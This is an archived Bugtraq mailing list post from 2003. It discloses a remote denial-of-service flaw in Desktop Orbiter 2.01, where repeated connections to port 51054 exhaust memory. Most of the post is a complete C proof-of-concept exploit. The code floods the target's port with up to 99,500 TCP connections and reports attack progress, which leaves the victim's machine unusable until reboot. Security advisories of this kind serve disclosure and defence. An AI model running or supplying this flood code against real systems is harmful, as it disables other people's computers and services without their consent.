Bugtraq mailing list archives
Remote DoS in Desktop Orbiter
From: Luca Ercoli <luca.ercoli () inwind it>
Date: 30 May 2003 13:08:25 -0000
SUMMARY: Desktop Orbiter (www.anfibia.it) is a client-server application that allow you to administer and secure your network. VULNERABILITY DESCRIPTION: At every connection to port 51054(of the server), a snapshot preview of the desktop is loaded in memory; by creating many connections to this port a remote attacker can fill the virtual memory and flood user with mass errors messages (like: virtual memory insufficent, exception error,out of memory and Desktop Orbitter's errors). The application must be killed to regain normal functionality of the system, but it's hard to do because any process can't be executed and right bottom of the mouse (usefull for kill process) is disallowed by errors messages; At the end of attack, user must reboot computer. PLATFORM AFFECTED: Desktop Orbiter 2.01 (prior?) EXPLOIT: #include <netdb.h> #include <sys/types.h> #include <netinet/in.h> #include <sys/socket.h> #include <unistd.h> #define PORT 51054 int main(int argc, char *argv[]){ int sockfd; struct hostent *he; struct sockaddr_in their_addr; int c; int n; char *host = NULL; int cnt=1; if(argc < 2 ) { printf("Usage:%s -h <host>\n",argv[0]); exit(0); } while((n = getopt(argc, argv, "h")) != -1) { switch(n) { case 'h': host = optarg; break; default: printf("Bad Input\n"); exit(0); } } if ((he = gethostbyname(argv[2])) == NULL) { herror("gethostbyname"); exit(1); } their_addr.sin_family = AF_INET; their_addr.sin_port = htons(PORT); their_addr.sin_addr = *((struct in_addr *) he->h_addr); bzero(&(their_addr.sin_zero), 8); printf ("\n\n\t\t#########################################################\n"); printf("\t\t# Proof of Concept by Luca Ercoli luca.ercoli () inwind it #\n"); printf("\t\t# Desktop Orbiter 2.01 Denial of Service #\n"); printf ("\t\t#########################################################\n\n"); printf("\nAttacking....\n\a"); if ((sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) { perror("socket"); exit(1); } if (connect (sockfd, (struct sockaddr *) &their_addr,sizeof(struct sockaddr)) == -1) { perror("connect"); exit(0); } for (c=0;c<99500;c++){ if ((sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) { perror("socket"); exit(1); } if (connect (sockfd, (struct sockaddr *) &their_addr, sizeof(struct sockaddr)) == -1) { printf("\n[Attack status] Step %d/25 : Complete!",cnt); if (cnt == 25) { printf("\nAttack Complete!\n\n\a"); exit(0); } cnt++; sleep(1); } close(sockfd); } printf("\n"); return 1; }
Current thread:
- Remote DoS in Desktop Orbiter Luca Ercoli (Jun 01)